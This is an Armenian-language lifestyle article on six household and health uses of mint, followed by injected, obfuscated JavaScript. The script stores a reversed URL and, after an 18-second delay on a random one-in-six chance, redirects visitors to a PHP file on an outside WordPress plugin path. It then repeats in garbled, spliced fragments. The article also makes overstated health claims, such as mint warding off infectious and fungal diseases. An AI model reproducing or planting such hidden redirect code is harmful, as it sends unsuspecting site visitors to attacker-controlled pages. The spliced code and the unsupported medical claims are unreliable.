
Անանուխն ավելի օգտակար է, քան դուք կարծում եք
Տարատեսակ խոտաբույսերն ու համեմունքները կարելի է օգտագործել ոչ միայն թեյին կամ ուտելիքին յուրահատուկ համ ու հոտ տալու համար: Շատերի համար դրանց օգտագործման տարբերակները չափազանց շատ են: Դրանցից շատերի մասին դուք, հնարավոր է, չեք էլ կռահել: Այսօր կխոսենք անանուխի մասին: Այս խոտաբույսը ոչ միայն հիասքանչ համ ու հոտ ունի, այլ նաև կարող է ձեզ օգտակար լինել շատ իրավիճակներում: Ստորև ներկայացնում ենք այն 6 իրավիճակները, որոնց դեպքում ձեզ անանուխն օգնության կգա:
Որովայնի ցավերի հեռացում
Անանուխն օգնում է թուլացնել մարսողական համակարգի մկանները և վերացնել ցավերը: Այդ իսկ պատճառով, եթե նյարդային հողի վրա ստամոքսն է գլուխ բարձրացնում, անանուխով տաք թեյ կամ պարզապես անանուխով և կիտրոնով գոլ ջուր խմեք:
Վարակիչ հիվանդությունների կանխարգելում
Անանուխը բավականին ուժեղ հակամանրէային հատկություն ունի: Սննդակարգում անանուխի պարբերաբար օգտագործումը ձեր օրգանիզմին կօգնի թեթև տանել կամ ընդհանրապես արգելակել վարակիչ կամ սնկային հիվանդությունները:
Պայքար մկների դեմ
Եթե ձեր առանձնատան բակում մի քանի անանուխ տնկեք , ապա վստահ եղեք, որ մկներն ու առնետները կշրջանցեն ձեր տարածքը:
Գլխացավի անցկացում
Գլխացավը հաճախ կապված է անոթների ջղաձգության (սպազմ) հետ: Այնպես, ինչպես որովայնային ցավերի դեպքում, կօգնի անանուխով տաք թեյը կամ պարզապես անանուխով ջուրը:
Քթի փակվածության դեմ
Դժվարանու՞մ եք շնչել: Թրմեք անանուխը եռման ջրի մեջ (կամ նորից թեյով) և ինհալյացիա կատարեք՝ շնչելով մենթոլի գոլորշին: Գործողությունը կլինի ճիշտ այնպիսին, ինչպես քթի կաթիլների դեպքում, բայց այս տարբերակը բնական է և ավելի էժան:
Անանուխային սառույց
Զգում եք, որ անանուխն արդեն պետք է շտապ օգտագործել, որովհետև այն սկսում է փչանա՞լ: Դրա տերևներով սառույց պատրաստեք: Հետագայում այդ խորանարդիկները հարկ կլինի դնել ջրի, լիմոնադի կամ սառը թեյի մեջ՝ այդպիսով ըմպելիքին թարմ նոտաներ հաղորդելով:
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-un-coctel-con-histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria-1.jpg” alt=”” width=”817″ height=”623″ />